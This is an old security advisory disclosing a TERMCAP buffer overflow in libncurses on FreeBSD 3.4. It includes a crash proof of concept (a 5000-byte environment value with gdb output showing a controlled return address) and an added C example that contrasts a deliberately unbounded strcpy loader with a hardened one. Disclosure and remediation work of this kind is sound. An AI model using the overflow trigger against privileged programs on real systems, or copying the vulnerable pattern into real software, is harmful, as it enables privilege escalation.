_____________________________________________________________________

   b u f f e r 0 v e r f l 0 w   s e c u r i t y   a d v i s o r y   # 3

Advisory Name: libncurses buffer overflow
Date:          24/4/00
Application:   NCURSES 1.8.6 / FreeBSD 3.4-STABLE
Vendor:        FreeBSD Inc.
WWW:           www.freebsd.org
Severity:      setuid programs linked with libncurses can be exploited to
               obtain root access, since the TERMCAP environment variable
               is under the control of the unprivileged invoker.
Author:        venglin (venglin@freebsd.lublin.pl)
Homepage:      www.b0f.com

* The Problem

An over-long TERMCAP environment variable overflows a fixed-size buffer
inside libncurses during initscr(). The session below sets TERMCAP to 5000
bytes of "A" and runs a minimal program that does nothing but call initscr();
the fault at 0x41414141 shows the saved return address overwritten with that
data, which is what makes the bug exploitable rather than a plain crash.

lubi:venglin:~> cat tescik.c
#include <curses.h>

main()
{
    initscr();
}
lubi:venglin:~> cc -g -o te tescik.c -lncurses
lubi:venglin:~> setenv TERMCAP `perl -e 'print "A"x5000'`
lubi:venglin:~> gdb ./te
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-unknown-freebsd"...
(gdb) run
Starting program: /usr/home/venglin/./te

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()

* Vulnerable Versions

- 3.4-STABLE  -- vulnerable
- 4.0-STABLE  -- not tested (probably *not* vulnerable)
- 5.0-CURRENT -- *not* vulnerable
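The pattern behind the crash above, and the two checks a termcap loader needs, as an added example that is not the ncurses 1.8.6 source nor the FreeBSD fix: a fixed 1024-byte entry buffer (TERMCAP_BUFSIZ is an assumed size), an unbounded copy of the environment value in the vulnerable shape, and a hardened loader that bounds the copy and additionally refuses TERMCAP altogether when the process is set-uid, which is the condition the advisory's severity line depends on. The helper names and the sample termcap entry are constructed for this illustration.

```c
/* Added example: bounded TERMCAP handling. Not the ncurses 1.8.6 code. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define TERMCAP_BUFSIZ 1024   /* assumed fixed-size entry buffer, as in classic termcap */

/* Nonzero when the process holds privileges its invoker does not.
 * FreeBSD provides issetugid(3) for exactly this; the uid/gid comparison
 * below is the portable approximation so the example builds elsewhere. */
int running_setugid(void)
{
    return getuid() != geteuid() || getgid() != getegid();
}

/* Vulnerable shape: unbounded copy of an attacker-controlled environment
 * value into a fixed buffer. 5000 bytes into 1024 overwrites the saved
 * return address, hence 0x41414141 in the advisory. Never called here. */
int load_termcap_unsafe(const char *value, char buf[TERMCAP_BUFSIZ])
{
    strcpy(buf, value);
    return 0;
}

/* Hardened: refuse TERMCAP in a set-uid process, and otherwise copy only
 * when the whole value (plus NUL) fits. Returns 0 on success, -1 if rejected. */
int load_termcap_safe(const char *value, int privileged, char *buf, size_t bufsz)
{
    if (value == NULL || buf == NULL || bufsz == 0)
        return -1;
    if (privileged)                 /* the invoker must not feed terminal data to root */
        return -1;
    const char *nul = memchr(value, '\0', bufsz);
    if (nul == NULL)                /* no terminator within bufsz: too long */
        return -1;
    memcpy(buf, value, (size_t)(nul - value) + 1);
    return 0;
}

/* Reproduces the advisory's `perl -e 'print "A"x5000'` value (constructed). */
int demo_long_value(void)
{
    char buf[TERMCAP_BUFSIZ];
    char *value = malloc(5001);
    if (value == NULL)
        return -2;
    memset(value, 'A', 5000);
    value[5000] = '\0';
    int rc = load_termcap_safe(value, 0, buf, sizeof buf);
    free(value);
    return rc;                      /* -1: rejected instead of smashing the stack */
}

/* A plausible entry (constructed, abbreviated termcap line) is accepted intact. */
int demo_sane_value(void)
{
    char buf[TERMCAP_BUFSIZ];
    const char *value = "vt100|dec vt100:co#80:li#24:cl=\\E[H\\E[J:";
    if (load_termcap_safe(value, 0, buf, sizeof buf) != 0)
        return -1;
    return strcmp(buf, value) == 0 ? 0 : -1;
}

/* A set-uid process refuses the variable even when it would fit. */
int demo_privileged(void)
{
    char buf[TERMCAP_BUFSIZ];
    return load_termcap_safe("vt100:co#80:li#24:", 1, buf, sizeof buf);
}

int main(void)
{
    char buf[TERMCAP_BUFSIZ];
    const char *tc = getenv("TERMCAP");
    if (tc == NULL) {
        puts("TERMCAP unset");
        return 0;
    }
    if (load_termcap_safe(tc, running_setugid(), buf, sizeof buf) != 0) {
        puts("TERMCAP rejected (too long, or set-uid process)");
        return 1;
    }
    printf("loaded %zu bytes of termcap data\n", strlen(buf));
    return 0;
}
```

Build with `cc -o tc tc.c` and run it once with `setenv TERMCAP \`perl -e 'print "A"x5000'\`` to see the value rejected where the advisory's test program faulted. Refusing the variable when set-uid is the more important of the two checks: a bounded copy stops the overflow, but a root process that still parses a terminal description chosen by its invoker is trusting input it has no reason to trust.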